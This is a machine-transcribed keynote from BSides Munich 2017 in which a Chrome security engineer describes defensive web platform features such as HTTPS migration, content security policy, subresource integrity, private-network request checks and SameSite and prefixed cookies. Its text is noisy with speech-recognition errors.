← All talks

Keynote: Hardening The Web Platform

BSides Munich · 20171:06:20135 viewsPublished 2017-04Watch on YouTube ↗
Speakers
Tags
StyleKeynote
About this talk
Keynote: Hardening The Web Platform by Mike West at the BSidesMunich 2017
Show transcript [en]

hi i'm mike west i just noticed i work at Google on the chrome team and I'm actually kind of curious how many of you because I'm not at all familiar with the audience here how many of you would consider yourselves web developers no 10 [Music] 13 how many of you would consider yourselves hardware hackers how many of you would consider yourselves something and completely dinner accident okay well I don't like we could you at least interested in the web how many of you have ever seen a website good we've got some common ground objective I work on the chrome security and what I'd like to talk to you about today is the way that we're approaching the web platform and

the way that we're approaching the API is that we give to developers and the way the platform is designed in general the platform has kind of organically grown over time some pieces of the platform make a whole lot of sense and other pieces of the platform make no sense whatsoever but they're kind of these are black semantics that are stuck with when I talk about a platform I'm really talking about the AP is that we give to developments on the surface area that there's AP is present not only the developers but also to attackers I'd note by the way that this link for slides is up and available right now so none of you have laptops which is great

but if you did have a laptop I would suggest that following along here would be helpful just because there are a lot of links this presentation is basically a brain dump of a variety of projects we're working on that I think are important and if you're at all interested in developing things for the web these things are going to be paying are these things are going to be api's that are available to you in the near future and that I hope you start talking her out of it so I consider myself a web developer at heart I've kind of moved on from web development i'm starting i'm working in chrome itself so about five or six years ago i started on the chrome

team started programming in c++ but before that I worked on the web and I did HTML CSS and JavaScript peloton was a prime web developer the very first browser that I ever uses this one know about mrs. yes mosaic in CS a mosaic I think I got this and like my parents got internet in a box right so it's a box delivered to our house it was great he hooked up our modem we dialed in and use mosaic to get to various websites and the work that many websites at this point was like 94 95 and for me it was absolutely transformative to see a few source option here because I would browse around the web and I did all this

great information and then I realized that not only was there information out there but I could create it myself and this is factory today we were coding everything by hand uphill both ways in the snow so you can actually look at the source of a page and map it mentally pretty easily to what was rendered on the wage so there was a one-to-one relationship here and it was really just transformative for me to see that I myself could build these kinds of websites about five years ago when I started working on Chrome I realized there was kind of another layer of view source because all of that HTML CSS and JavaScript is actually rendered to

receive electronic or through rusts or threw out some other lower level language and building those those browsers is a massive projects chrome chromium itself is hundreds of thousands of lines of code we have lots of dependencies that bring the numbers up significantly higher it's a large project and anyone who's ever worked on a large project will tell you that large projects are never finished and in fact large projects are always broken in various ways though it continually surprises me that chrome works at all because we keep walking through these things you look at code you say this code is crap how could this ever have worked and then you realize that you yourself wrote it three years ago and

now you get to fix it so I've written a number of to do's myself I looked through the carrier-based last night there about 14,000 two dudes in the topics there another two or three thousand fix me comments in the code thing so there are a lot of problems that we know about and we knew about them when we were writing the code because otherwise the comments wouldn't be there right if you look at the bug tracker than we have so if you go to see our bug calm you'll see another several hundred thousand bugs that are open so people are reporting bugs to us it's not just bugs are you and that we knew about when we were

writing but people are also telling us about things we didn't know about them we're writing so the project itself is very physical it's very large and we're human we're following we're going to make mistakes so there are bugs in the project that we know about their bugs in the project that we don't know about and all of these together mean that the project itself is broken but imagine magic promotes imagine that a team of elves came in overnight and fix every bug incur may be absolutely perfect it would implement every standard perfectly so every line of every standard is done the elders even at tests so that we won't drastic screams so we have a

well-tested perfect implementation of every standard out there for the web my contention is that it would still be broken and it would be broken not because the code didn't do what we expected it to but because the implications of those expectations are actually different than what we thought they were we were designing things in the personals the platform itself has issues and those issues are baking the design of the platform this is especially true for really old things so if you look at the original HTML spec and the original JavaScript implementation for for netscape without in today there are there are issues of design that make it difficult for us to really lock things out there are just

some things that we made some really good decisions way back when so maybe same origin policy for website so that you know your example calm cannot access bank conferences that wasn't a given so way back in the day they were really there were actual questions about whether it should be possible for you to load data from anywhere and to make requests anywhere and to just treat everything is one big homogenous pool of data and that makes a lot of sense when it's used for science and literature it makes significantly less sense to infuse for baking baking applications so we made some good decisions way back line but we also made some bad decisions and I'd like to talk about is the way that

the chrome team is approaching this position so in the way that the current team is those looking backwards to try to fix old 80 is but also looking forwards to design new AP is in ways that actually make sense so the chrome team is really concerned with regard to the web platform with too well I am really concerned with two main classes of attacks so I assume that the browser is perfect I assume that the elves came in at some point and fixed all of the implementation bugs and what I am trying to do and my team is trying to do is actually build on top of that you know Kwazii perfect system and leave the

imperfections to the rest of the security who is worried about finding all those bugs in six mo so from my perspective but browser itself by design is a confused deputy so this describes a class of attack that uses the browser's privileged position as your agent on the web so we call it a user agent the browser is you represented to the web and the browser makes requests on your behalf the browser's stores data on your behalf and browser shares data on your behalf and it can very easily be tricked into doing things that neither the server nor the client actually wants it to do so two broad classes of attacks are things that I really want to fix no

I think are really important the first is called cross-site scripting who's heard of cross-site scripting everyone as I said you said you were five developers what's going on cross-site scripting is as you all know a mechanism of tricking a server into delivering code that the server doesn't actually expect to be delivering so I talked about the same origin policy earth and as you probably know any code that executes in the context of an origin has all the power of that origin so if I can trick a server into delivering JavaScript then the server will send that JavaScript down to the client the crime will execute if you know anything about v8 in grown you know that VA loans

JavaScript and wants to execute absolutely as quickly as possible and this is a great thing when it's actually too did you attend it's kind of a terrible thing if the code isnt what you actually wanted to have anyone so cross-site scripting is a big problem almost every website is going to have an injection attack of one sort or another Google husband Jeff Kent attacks even though we have an internal security team whose entire job is dedicated to preventing these kinds of attacks it's quite possible that besides that you're responsible parasites that teams your companies are responsible for has similar kinds of holes if you look at the vulnerability reward program at Google where we take researchers to tell

us about bugs instead of exploiting them we see that cross-site scripting is easily the largest category we have at people again even though we invest a ton in stimulating systems and even though we invested time into education internally so the second kind of attack that I think is pretty interesting it's called site request forgery so again the browser doesn't really understand what's going chrome firefox whoever it's going to make requests on your behalf and when it makes those requests it's going to make them with your sword with you as the user initiating the request or at least that's what it looks like to the server so is evil com makes a request to bang com it's going to send your cookies

along with its going to send the token of the bound tokens along with it and the channel ID and whatever else so all of the authentication information is being sent along with leezar advice so if the server is not defending itself against this kind of attack that it's quite possible for evil calm to change safe on bank calm perhaps by transferring all of your money to eagle on top this ends up being back in a variety of ways it's something that I think we need to address in one way or another and I'll talk a little bit about the strategies really different don't even know Mario Heinrich Mario is a great job he's incredibly smart last

year he suggested that web security has become a paradox that web apps both complex and secure cannot be built that the web staff has grown beyond that being possible yay so he's happy I think he's happy because it's a pen tester so he really wants these holes to continue to exist so that you can keep hacking into websites and educating developers but i find this sentiment somewhat nihilistic and I think that it's unfortunate when we look at the platform and say well the platform is large and it's powerful so therefore it's indefensible I think instead what we should do is actually examine the platform and figure out what changes we can reasonably make so the current mean

at least the web platform side of the chrome team is really interested in measuring the usage of various things on the web so we have a metric system internally where if a user ups into sharing usage data we can kind of figure out how often certain api's are used so these are not really complicated counters it's really just if a thing happens and increment something and then we look at those counters and say well on expert pageviews wife and using this kind of information we can look at the old API is that we don't like and we can look at the way that those api's are actually used and try to figure out what changes

we can reasonably make in order to make those api's better so you like everything else is Google we try to be data-driven and we try to understand the impact on users but that doesn't mean that the platform is immutable so we definitely want to look back at these old api's and figure out what kinds of changes we can really make at the same time we want to look forward and we want to give developers API so something we talk about internally in the chrome team a lot is the idea of giving developers sharp tools so if you've ever cooked or cut anything with a knife you'll recognize that a sharp knife is significantly easier to use and

therefore significantly safer than a dull knife if you have a really sharp knife it'll cut right through things you don't have to exert much pressure which means you have a great degree of control over where the blade is going if you have a dull knife and you can't really cut anything unless you exert a lot of pressure and when you exert a lot of pressure do you use control over where the knife is going so if you're cutting some food it's quite likely that if you have to press really really hard to deny it will slip and you'll end up cutting yourself so we want to give developers sharp tools because we see when we don't

give them sharp tools that we end up with things like flash areas that we say exactly if we don't give them the tools in the platform they will route around the platform in whatever ways they can they will see the platform is damaged and they'll route around it so you'll get things like flash that end up causing significantly more problems over a longer period of time than a well-designed API that actually gave them the power to do the things they wanted to do in the first place so the current team is really interested in giving people sharp tools and if you look at sharp tools you recognize a couple of things that I think are really

good metaphors for security on the web so you'll see that the tool has a sharp piece I mean not so sharp piece it's relatively obvious in between those two pieces however you'll see a little brass bar and at the guard so the guard serves a couple of important purposes first it stops the knife from sliding down your hand cutting yourself on the sharp blade so it gives you context in which you can actually use this tool makes the tool easier to use and give you some guidance as to how it is right you hold the hills you don't hold the blade second it stops sharp objects from sliding down the blade to cut your hand so if you're a fight if

don't my type but if you are a nice fighting then you want to have a knife that has a guard because it will actually stop the opponent's knife from sliding down your blade and cutting year and a half so it protects you from things on the web and the interesting thing about this is that it's not an opt-in protection its structure it's built into the tool itself so you are protected in some way from attackers on the web just by having this tool because the tool is designed in such a way to perfection the second thing you'll notice is that knives and swords and other bladed instruments usually have a sheet or a scabbard or some mechanism by

which you can put the knives away and make it blunt so if you have pigs at home you probably don't want to leave a sharp knife lying around you once said put it away into a knife block or into a sheath or a scabbard or something and that will actually build a knife because the outside of the sheet is not going to cut anybody you can hit them on the head with it but you're not going to come and dulling the edge of a sharp blade did you know that you're not going to use it's a really good metaphor for the kinds of Austin protection so we can give to developers by providing them with AP is that allow them to lock their

sites down more more securely than we can do by default so we have all these api's people are relying on them we can't just change the web out from under them but we can give you the ability to change your own application so make it different than the rest of the web and actually more secure by simply turning off things that you know you're gonna use you can reduce the service area for attack simply by putting your night or putting various api's into she's so let's start with this idea of a guard what are the structural changes that we can make the web to make it better to make the api's on the platform that we

provide the developers more sensical and more sensible the very first thing we need to do is improve TLS that's absolutely critical this structural change is something that's been ongoing over time so the chrome team has been very just over time at getting folks to start using encryption and start using HTTPS as opposed to http I think Firefox is published their telemetry that shows that they finally gone over the fifty percent mark so people's people in Firefox use more pls than non TLS and police in terms of time they're browsing I think Chrome has similar numbers published on Google's HTTPS transparency you haven't seen that I think it's pretty interesting it shows you excuse me it shows you how much rules traffic

is encrypted and I think it's something like EV nine percent at the moment the outdoor incoming traffic and it also gives you an overview of kind of where websites are and what large websites have transferred over and what and whether they have good TLS configurations and then what websites have in trans terminators there's a really great website in the state's called secure the news and this actually do through a lot of news websites and will tell you whether or not they're using HTTPS now news websites in the states are not great there are a lot of these websites that are using TLS and actually some large websites have just made the jump so in New York Times for

instance just transferred over I think last month which is great it's really exciting news sites in Germany are not quite with the game or at least I haven't seen them be that way so to go outside Eagles Stan these are all not available over TLS and in fact most of them some of them will actually redirect you to http if you do to https others will not even load the page at all so if you go to build https do that ze it will give you a 410 error that says this page is not available in very stated yes it loads the page over HTTPS but it doesn't give you any data it just gives you an

error it just kind of said regardless new sites and these kinds of non login sites are things that some people think don't really need TLS because you know why do you really care TLS gives you a number of important benefit it gives you a modicum of integrity that is you know the bits that are being delivered over the wire or actually intact when they get to you and haven't been modified by someone in between so if folks aren't injecting as your websites and they're not changing your website so that you know that if there's an article on to Deutsche that is actually süddeutsche I writing it and not Vodafone injecting an article that's really positive about Vodafone so you

get integrity you also get authentication that is you know that the server that you're talking to is the server that's justifiably using that name so it's not any signal to the it's actually be supposed to be you and it gives you a measure of confidentiality so no one knows what articles you're reading so that if you're really interested in the new Power Rangers movie no one's going to judge you for it because no one knows that you're really interested in our interest movie probably a good movie but you know one of the things that's changed recently is the introduction of lesson grants anyone heard that let's encrypt excellent wonderful lesson grip is really exciting because it is a certificate authority

that has significantly better properties and a lot of certificate authorities had in the past a lot of people have really focused on the free notion let's encrypt that is it gives you a certificate you don't have to pay them for it and that's great because it really opens the doors to a lot of people that weren't going to pay for certs but should be using circus but I think actually the more important change is not free but automated that is there's a protocol called Acme which allows you to obtain a certificate for a server without manually going through the process of going out grabbing a surge installing on your on your server and then setting up your server such as

it's actually using the cert to deliver to deliver an encrypted connection the automation portion of this is incredibly important it's important for a couple of reasons saving status quo you'll generally go to Samantha you'll buy a search it'll be good for about three years and after three years and one day you'll run a fire drill because no wonder the company has any idea how to deploy a cert because the last time you did it was three years ago and the three people responsible for it have all left the company so each I'm sorry or they don't remember right we did no one documents thing so when there is a fire drill and when your cert has expired you

need to go out and figure out how to do all this stuff and it just it never works out the way that it's supposed to let's encrypt I think by default right I think right now only serves our only gives you a certain from 90 days and I think the goal is to reduce that so that it's not three years but 60 days or 30 days or three days these kinds of short-lived certificates I would really love to see that be the norm for a variety of reasons first of all because it's automated looks thank you because it's automated and because there's this protocol behind it and there's a program running on your theater it's going to be

something that you do on a regular basis it's going to become part of your normal deployment process as opposed to a one-off thing that you do three times a decade it also gives us the opportunity to change the civic and ecosystem more rapidly than we've been able to do in the past so if you followed along neta stuff in the last two years you've heard a lot about style one and you've heard a lot about at least chrome trying to deprecate sha-1 as a signature algorithm for certificates because it's not good enough these days it has taken an incredibly long time to get shell 1 deprecated and this was partially due to reticence on the part of ca's to make

any changes whatsoever but it's also due to the fact that if you serve certificates or if you sell a certificate for that's good for three years and we have to support it for three years because otherwise we're making people sad so by reducing the longest amount of time that you can service tificate for we're actually making it possible to change the ecosystem more rapidly so shorter load certificates along with automation is absolutely going to Perdido system that said deploying a certificate is still more difficult than it ought to be there are a couple of servers coming out these days that actually build TLS into the core infrastructure of the server so caddy is one of them County is

incredibly simple to set up and all you have to do is point a dns name at it and then you will get a cert it'll get a certain on your behalf it will renew the cert on your behalf and it continually updates the configuration of the server so you don't have to care about things like cyber suits or algorithms or anything you all you have to do is deploy caddy and then like magic your tlf set up we'll just keep iterating and keep getting better over time wire is an organization in the States or a magazine that has migrated over to JLS and what they did is that I think is really nice it has put together a series

of articles talking about the way they did the migration and the problems that they ran into overtime and this was incredibly useful to us as browser vendors and also as API designers to kind of figure out what the holes were and where people were running in pain so these are really good articles if you're at all interested in migrating your site's over to TLS is anyone willing to admit that their company does not serve their website or tails okay actually so those folks I would really recommend that you take a look at these articles and the rest of you they didn't want to admit the fact that your site is not a repeal up I should all take a look at

these articles because they really go through a lot of the struggles that large companies will face when doing the exact migration so I may I migrated Mike Weston word over TLS years ago and it said like an hour it's relatively straightforward I knew all the content just five months this don't significantly longer and I think that what what's interesting about these kinds of larger sites is that they run into very different problems than you see on smallest one of those problems is mixed content so mixed content is basically a guarantee that we give to users we say if you see TLS that is if you see an encrypted connection we want to verify to you that everything on this

page is encrypted because otherwise we're lying to you if we tell you that it's secure so we block things like script loaded from AC or from HTTP on an HTTPS side because there's no integrity for that script it could be anyone delivering script at this page and this is something that we think that certainly wired saw and other folks have seen as a real blocker towards us how to migration there are large news organizations that have run websites for long enough that they have lost the previous to CMS is that they used to deploy any sort of content to the website so they have a database the database is full of stuffs but they have

no program that actually interacts with that it's just sitting there serving stuff on their website and for various reasons the reticence actually go through those database entries and modify them because you know they might break things and they don't have any way of recovering from that breakage so we've talked a little bit with these folks and kind of tried to design a P is for them that enable them to continue serving their websites but do it in a secure way so one of those is called upgrade in situations we know that you sell https as HTTP on your website you wrote HTTP example a calm but you really meant HTTPS so you can instruct the browser to kind of make

this transition for you so that we will automatically upgrade the request before we send them out on the wire and we'll treat them as next contact so if you have an image on your page that's linking to https devil um if you set upgraded security quests then we will automatically upgrade that and ensure that we never have mixed content on your website because we're always upgrading the request a shin yes what's interesting about this but it also cascades down into frames so that if you load various content on your website we can guarantee to you that we're never actually going to degrade the UI that we display to be uses we're always going to be loading good content that's over an

encrypted channel this looks like upgraded feature requests the header as part of content security policy that will talk a little bit later about and the idea here is that you deliver this HTTP header along with the page and you say i know that i spelled things HTTP on this page but please browser help me out here and we'll do that upgraded security glasses available in basically every major browser today except edge edge is working on but they're not quite there yet so it was just deployed in iOS 10 3 that came out last week I think so Safari 10 3 years on Iowa's sports and one on Mac its bidding chrome for a long time and it's been in Firefox for a long

time which also means that it's an opera and this gives you a pretty good coverage with regard to upgrade it to request and if you look at this library will to see that they found this to be an absolutely critical portion of their upgrade backers so allowing them to do this allowing them to up great things about actually changing things on disk was incredibly valuable to go so the inverse of it you'll recognize it upgraded secure requests is basically the site asserting to the browser that it's supposed to be loading phase generation guess so asserting the third-party resources should actually be issued yes the inverse of this would be those third parties asserting if they

should always be loaded their accts even if you sell them as HTTP so a good example of this would be youtube com youtube com has been around long enough that it wasn't though ways delivery over HTTPS it isn't delivered over HTTPS now when it's serving an HF TS better which means that the browser will never connect to it over HTTP we'll do a client-side redirect before actually going out to the web which means that you'll never make a non-secure connection to youtube.com at sea than there was however there are tons of youtube com frames on the web and those frames are all HTTP youtube com because that's what they were when the person originally copy and pasted it and no

one's going to go through and change a billion frames in the web it would be nice if we use hsps in order to upgrade those requests to unblock those websites from actually upgrading to TLS without forcing them to go through all their code and make changes unfortunately this introduces a little bit of non-determinism because you as a developer have been to every resource that you require you've been to your CDN you have the hfcs pin for that website so you know that you're always going to load a diverse CBS but your users have never been to your cydia and never will be to your cpa or never will go to your TV a which means they will see breakage

they will file bugs you will close the bugs because it works for you and then everyone will be sad when you actually figure out what's going on what we'd like to do is reverse the order of hsps admix content so that hsps happens first does the upgrade but does it in such a way as to not introduce this non deterministic behavior so one approach to this that Firefox is implemented and is in the process of applying or at least as a mountain i'm experimenting with it's something called hspf priming and the idea here is that if we're going to load a non-secure resource we will first make an HTTP x request to that origin and say hey do you have HS yes

and if you do great we'll keep will store that pen and then we'll upgrade the request and this removes the this makes it a deterministic process that is we will always get the pin if there is append to be gotten and because of that we should be able to invert these and allow those third parties to actually assert something about their own resources which I think I'll be pretty I would know however that this isn't just for websites it's actually kind of important to encrypt communications likes email forensics start TLS has been around for a long time and it isn't is an opportunistic encryption bag where a server that wants to send us an email

will ask permission to send some email from an SMTP server and it will along with that you'll say hey I can totally encrypt this if you wanted me to if you get the right response back then the transmission will be upgraded to an encrypted pls connection and then you'll send the email over an encrypted connection which is great because that means people can read your email or at least no one but those two parties can agree unfortunately because it's opportunistic is trivially blocked so an active network attacker only has to block a single header in the response and that's just trivia it happens all the time because people want to be able to read email any virus does it's a lot

where it says oh I did they can't read TLS but I'll just stop that TLS stuff so that I can parse all these messages and then stop it from getting the server any virus so it's a thing MTA FPS is basically applying the notion of HTTP or a chest es tu email so you have a DNS entry or you have a file sitting on your server somewhere that expresses a policy about your email sir by doing so you can actually in an out-of-band way assert that you should always have a TLS connection to me when you're Latino so this gives you similar properties they just es on the web if you have an email server I really recommend that you set

something like this up because the encrypted email is incredibly important yeah encrypted communication is there I'd also note that again looking back at these kinds of old api's it's it been the case we have launched a lot of AP is that looking back we kind of wish we hadn't launched in that way in particular there are a lot of AP is that are available over non secure connection that should never have been lost over not secure connection so geolocation is kind of canonical example it shouldn't be the case that by giving a origin to your location permissions you're giving anyone on the network between you and that origin glf inspiration because it is a non-secure origin there is no

authenticity which means I can four words that content to my heart's content so I can grab to your location just by being an active network backer that's kind of unfortunate what we're trying to do now is looking forward only launched new colorful AP is that are using TL their locks through a secure contacts so you can have geolocation on 18 yes but you can't have geo location of HTTP there are a variety of API doing so geolocation is a canonical example web crypto getusermedia so your camera and your microphone credential Iseman API service workers payment requests and many many more the idea is these kinds of AP is especially if you guys that have permissions associated with them

are only it's only a meaningful granted permission if it's lots to in a context you can assert something about you can't discern anything about HTTP so giving access to these api is a very should be is simply about idea again looking at the data that we have we've been able to deprecate a number of these api is over HTTP so geolocation was turned off last year at the early last year over HTTP so you can only access reservation yeah my hope is and will become more aggressive of others I would like to live in a world where we only launched new API over HTTPS that's been a difficult sell both internally and externally but i

think that browser vendors in general or started to get on board with the idea that shipping new API HTTP is simply that idea the last kind of structure will change i'll quantum at is a distinction between internet and Internet so again your browser is a privilege is in a privileged position and is acting on your behalf with your credentials one of your credentials it's actually the network that you're connected to if you happen to be in an office connecting to network you have access to different kinds of resources then i would have access to you from outside that office because you're in trusted internal network you're running on a trusted machine and you're able to

make requests to things like your printer or your router but i wouldn't be able to make a request to you at least on that poured from outside because of this it's become relatively common like one kind of time it's relatively common unfortunately common is a tax on people's routers because routers are generally at known location so one that if you want 60 one is probably going to be a router and if not it's going to be 10 one or something along those lines because of that and because of the fact that router is never actually expected to be attacked by the web and are written in such a way that makes csrf style attacks trivial and number of cases it's quite

possible for an attacker to force your computer to make a request to your router that then changes your DNS server so that you're using the tuckers dns server and at that point your web is very different than the web that actually exists because of this we'd like to make it more difficult for attackers to use that privileged position of your browser in order to attack things that the web doesn't normally have access to this includes your local internet but it also includes things running on localhost so on the loopback address if you install some software locally then it's quite possible but that's all for it sets up a server and then serves require response to requests for particular origins

Dropbox does is Spotify those as Google on some products that do it it's relatively common let's try to kind of give a website a little bit more access so Dropbox for instance wants to know whether the dropbox client themselves that it can give you a link that do is to your local policies and they do this by having a server running locally and accept requests from dropbox com and dropbox is clever enough that they do reasonable course checks on this information so they verified it it's actually coming from dropbox com and not from anyone on the web Trend Micro was not going to be kind of checks and because of that actually has a remote

code execution on your computer just by sending an HTTP request to local lips which is kind of not awesome it would be great if that wasn't to think about it I would like to do is split the web into these three layers at least these relays please please make up to me so you have the web the outside stuff you have internet and there's an RFC RFC 1918 that defines and a couple of other updates that define a set of ips that are internal or reserved for internal use this is completely different in ipv6 I have no idea what we're going to do there but at least try to you before we should be able to make something work

and then you have local ins and you can kind of think of this as an onion and the privileged kind of expand you get down if you want to lock down access to local oh and you want to lock down access to the Internet and we can do this by expanding the notion of course so their cores cross-origin resource sharing and it's basically a system by which origin one can ask permission to make certain requests origin to generally we only do this for non simple request and course turns what I'd like to do is extend that to actually force a course pre-flight for any request that crosses one of these boundaries so if you're going from the

web to localhost the browser will first send an option to request the local is it's okay do you understand the course protocol do you understand that you're going to get a request from someone outside of your network and you totally have to set up if if the software is written in such a way that is acceptance requests and sends a reasonable response back then it will allow the request if the software doesn't respond because doesn't understand options or doesn't understand this protocol it will lock it down and we'll make sure that the web is incapable talking to things like hold routers that are never going to be updated I think that's pretty interesting it turns out to be really

difficult to implement because figuring out what IP address are going to be talking to is actually pitiable especially when ipv4 ipv6 world there's the the best named algorithm that I've ever heard is called happy idle and no idea what's called happy august so the idea is that you race life easy for an ipv6 connection and whichever responds first is the ones you're actually going to talk to you so its way down deep in the network stack and it's really difficult to get to the point that I know what connection i'm going to talk to you at a point where i can actually make this kind of creeped record class so i have like half an implementation of

this and blink and it turns out i'm going to have to do a little anyway let's move on to the notion pass these structural changes to opt-in changes that developers that building websites can use make their own websites more secure the first and foremost of these is called content security policy common security policy is a policy mechanism that allows you to determine what resources load on your page the basic idea is that you have resource and various types and you say okay script can load from these origins it can load for my CDN it can load from me myself but it can't load from you belong and they can't load from and this actually gives you the ability

to lock down your site to prevent cross-site scripting attacks or at least mitigate the risks associated with cross-site scripting common security policy is been around for a number of years now we're kind of just now getting to the point where it's useful we've seen github so github has done a great job with their common security quality they've actually put a ton of work into locking down the origins from our stated resources and they have probably the best list based on security policies I've seen where they actually know what's on every surface of the loading things from and can verify that their only loading their own code from those servers Google luck tom however has had

a much more difficult i'm deploying one of these lists based policies because as it turns out there's a lot of stuff on google com and if you're at all familiar with like return based or return oriented programming if you have these gadgets in your code you can kind of run any code just by stringing together gadgets and various buyers the same thing is actually true on origin blood google com there's enough code on google com that you can find something to load that's going to do the work that you wanted to do so it's totally possible to bypass a card security policy that's whitelisting on things like hula both github and dropbox have been using CSK

using it for quite some time and they put together really good descriptions of the ways that they've gotten into their current policy and kind of the challenges they ran into overtime and the things that they've learned during their plan so I think it's really worth your time to take a look at both of these if you're responsible for a website at all and you want to defend that website again say but college like cross-site competitor however these kinds of policies can start getting a bit absurd this is Twitter's policy Facebook's policy was even longer you start kind of running out of space on a slide to actually display all the origins of your loading things from it

turns out as I mentioned earlier that deploying a policy like this on a site like Google acog it seems pretty simple and happily however consecrated quality level to which is supported in basically all major browsers at this point as a as a mechanism called announced that allows you to whitelist a specific script not by origin but by saying I meant for the script to be on my page so you have a token that you send it a header so you're talking to ABC and then that token is reflective in your page as part of the script tag so if the tutor things match and you're doing a good job of rotating the tokens and generating a new token every time a

number used once then you can actually verify that this script is the script that you wanted to run because you knew that ok an attacker are trying to inject script in your page doesn't know that's open is therefore not able to execute scripts the smart folks on the Google security team has put together a set of guidelines for what they're calling a strict CSP and it's a certain on Stacy SD the idea here is that you use these noises in or it's a whitelist and or to allow specific script elements on your age and then you grant those script elements the authority to load news fair so there's something called strip dynamic and CSP three that allows you to

kind of give give power to the scripts that you load to load more scripts and this actually is pretty interesting because it gives you kind of a loader mechanism where you verify the loader script and then you say well my loader script can load stop say let it load things this turns out to be a really good way of employing CSP and making it much less fragile than these kind of origin based lists because if you are loading maps for instance maps is going to load whatever Maps wants to load you don't have to know all et servers that maps is going to use you just say max please do your thing you trust the

script and you allow that script to to load the various resource abilities so if you're at all interested in deploying content security quality a strict non-space EST using start dynamic is what suits inside of Google are actively deploying on Google products and it's something that's probably order to be significantly easier for you than the long list of origin you see on something actually I get up I also know that there's something called sub resource integrity and as you notice the moment ago comment security policy is generally origin base that is we say I trust this origin origin please give me script it is the case however that CD and get hacked jquery CDN was hacked a number of

times over time they were developing some resort integrity which i think is interesting the idea here is that it gives you a content-based mechanism of saying I want to load the script I want to load a script from this origin but I also want the script to be exactly the script that I think it is so I sent the script up to my CDN I take a hash of that script shots will shop 256 or buds ball or whatever and I reflect that hash in an integrity attribute within the script element on the page and this allows the browser to say okay I'm gonna download and then I'll verify it will make sure that this content actually matches the

content you subscribe the integrity and if you do this then you get a content-based check to verify not only but you're executing scripts in Georgia but it's actually the scripted you want in CSP three we're going to layer hatches on top of some resources a group so kind of security policy will verify the hashes that you that you list first specific script and then some resource integrity will verify that those hatchet is match the actual content this gives you a content-based mechanism allowing a specific strip to execute on your page which i think is gonna be really powerful especially for these kind of loader mechanism but we're talking about where you say I trust this script and

really I only trust this script not just any script of this order we've made a number of changes to cookies over time it cookies are kind of one of the large mistakes that we made with designing the web it's really unfortunate that cookies have a completely different security model than everything else so generally speaking we have an origin base security model let me say this origin is responsible for itself and not for anything else and it should have access to anything else that should have to request things from other origins it should just gain access my cookies however kind of brutal origins down to an effective TLD +1 so you have comm with the TLD he and then you buy

something calm so something calm is the etl v plus one there are also things like appspot com and appspot com in itself is kind of a TLD so we treated differently than we treat something like exam tomorrow so cookies have power up to the effective top-level domain so you even if I'm on something something made something something calm I can set Andrey cookies from eggs abelardo so anything under the seat Ald is kind of all lumped into the same pile there are a couple of things that we'd like to do to to change cookies to make them slightly less terrible at least in terms of its security properties a couple of those things are here so same

side cookies is the thing that I'm most excited it shifts I think in crim 51 Firefox is working on an implementation another folks are interested the idea is that instead of allowing the user agent to make authenticated requests on your behalf anywhere that website wants which enables things like cross-site request forgery of X you can specify that a specific cookie is same site that is I want to send myself this cookie but if anyone else initiates the request the cookie shouldn't be set so you can imagine a session serving for instance that is set to be a same site group that is if example calm sets the cookie great if example calm makes a request to

example like hi great but if example calm I'm sorry if evil calm makes your request to example calm then you shouldn't find that cookie a long way because sending that cookie will trick can trick the server into gating the request and saying no this is totally the user I think we should you know transfer all their money to the evil on top if that seems like it is it reasonable to do so same side cookies give you the ability to lock a cookie to a specific sites contacts you can I can make requests to myself so whenever I call my own API they should totally work but if anyone else calls my AP is you're

not going to deliver that cookie and because you don't deliver this it's relatively straightforward for the server to understand this is not an authenticated request and shouldn't actually be executed they elude that there's a wax attribute or relax value for the same side attitude so there are kind of two modes you can run the same psychic you set what is the lacs mode and a lacks node has the property that I just talked about where sub resource requests from evil calm will contain cookies when going to you google but if you navigate to vidcom will send McCurdy's a long way so it is a top-level navigation we'll treat that insane even though the navigation was initiated

by Ibaka strict mode won't treat that in the same side navigation and we'll say no evil law com initiated the request and we're not going to send it even though you're doing a top level navigation this gives you the ability to set up kind of a two kooky system so if you're familiar with like Amazon for instance if you go to Amazon it knows who you are and it says you know hello Mike would you like to buy all the things today and you say yes please give me all the things but when you actually want to buy things you have two real dedicated type in your password and then you go through the checkout flow so

there's kind of two levels of access the website there's a yup I know who you are and can show you a reasonable rendering to give you the information you're looking for and then there is you're going to take a dangerous action so I'm going to really examine with your glass more carefully by having these two kinds of cookies a strict and alack smooth same side cookie you can build the same sort of Mecca where you stand and have the browser guarantee that these cookies are only being sent in particular set of contacts and I think this is going to be pretty vulnerable as I said it's only in chrome right now but I'm hopeful the

fire box will be shipping it relatively soon as well Dropbox just put out a really good article about same site cookies and the way they've deployed same Cyclopes on their insights for CSRF protection I think it's absolutely worth your time to skim through tubes it has the potential to your evening mitigate an entire class about csr attic ducts old day will kill all of them but it has really good potentials pretty excited about to equal sports the next change that we've made is adding in a prefix to cooking games so one issue with your keys today is that you have no idea what the properties of that cookie actually are it was always sent into the server

is the name is about so you might have a security you might have an HTTP only turkey it might be same site it might not be you don't know when it's actually being delivered to the server what the property are and it's actually really difficult to change that because of the way the treaties are used and because they said wise they use changing that behavior would be incredibly difficult so what we're doing instead is smuggling some information in the name of the group and then making guarantees in the browser that cookies with certain names must have certain properties so there are two prefixes that are deploy today what is underscore underscore hose and the others

underscore underscore secure secure a straightforward you can only use the secure prefix if your cookie has the secure attribute that is it's only delivery of a GPS so is it a little bit more interesting we're actually making the cookie City Reta model as close to yours and security model as we possibly can we say this is a host cookie that is it has no domain attribute it is secure and it has a path that gives a group of is made and this basically maps a cookie to an origin more or less like it still only come reports but it does a pretty good job for https websites and i think this is actually being used on something

like zero point zero eight percent of the set turkey headers the currency is today so it folks like dropbox and took like github are using it as CSRF production because it gives you some good guarantees about the provenance of a particular key and the properties of that so we see this this is kind of new it's deployed in firefox exploiting chrome and folks are starting to use it so i think it's going to be pretty interesting going forward the last James that we've made the cookies is the secure attribute that I mentioned earlier so secure has been around for a really long time but it doesn't act it hasn't actually given you much guarantee of security because secure cookies could

be set deleted and modified by non-secure origins so this led some vulnerability to google.com it's love the vulnerabilities and other websites where a non-secure subdomain for instance will be able to set cookies on your demands so you can use session fixation attacks you can remove security type cookies and we want to lock that down low so we've made some changes to what the meaning of secure is that is secure should mean that it's only sent from a secure website from a secure origin and it can't be modified by a non-secure urge this also means that we've changed the eviction policies your cookies so it says non-secure cookies are evicted before security so if you have a non-secure origin you shouldn't

